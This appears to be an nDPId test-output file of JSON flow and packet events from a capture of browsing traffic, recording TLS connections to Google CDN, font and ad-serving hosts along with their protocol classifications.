-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReQAAAAAoAL9IG1mAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s24AAAAAoAL9IHV1AAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} 
-00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOkAAAAAoAL9INfoAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFQAAAAAoAL9IB2IAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygYAAAAAoAL9IOOcAAACBAWgBAIICqpUDK0AAAAAAQMDBw=="} 
-00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9285,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9285,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtsAAAAAoAL9IO7kAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9286,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9286,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns154AAAAAoAL9IJ6VAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9287,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9287,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUEAAAAAoAL9IA5NAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} 
-00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyUAAAAAoAL9ILYPAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9293,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1605291690952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690952,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu21pGefV\/3l9HVoBJXgDRiAAACBAV4AQMDAwQCCArC10u2GsMWnw=="} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9294,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1605291690952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690952,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dWRnn1ggBAB+7hZAAABAQgKGsMWucLXS7Y="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9300,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22KVwltPCUkXloBJXgMhIAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9301,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReWlcJbUgBAB+0w+AAABAQgKGsMWu8LXS70="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9302,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22it1t9ZMt7NvoBJXgClQAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9303,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23LTmo6vQxszqoBJXgBZ9AAACBAV4AQMDAwQCCArC10u9GsMWnw=="} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9304,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s28rdbfXgBAB+61FAAABAQgKGsMWu8LXS70="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9305,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOq05qOsgBAB+5pyAAABAQgKGsMWu8LXS70="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9309,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23lfa6eczuyRVoBJXgHLsAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9310,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFVX2unogBAB+\/bgAAABAQgKGsMWvMLXS70="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9311,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgRAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuVFgHH2llkCsoHoBJXgJ6iAAACBAV4AQMDAwQCCArC10u9qlQMrQ=="} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9312,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygcBx9pagBAB+yKXAAABAQgKqlQMysLXS70="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9315,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZEy\/C8or4r7coBJXgC2BAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9316,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZgWfUkJjbNefoBJXgN3ZAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9317,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtxMvwvLgBAB+7F0AAABAQgKuJU7UsLXS74="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns158Fn1JDgBAB+2HNAAABAQgKuJU7UsLXS74="} 
-00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 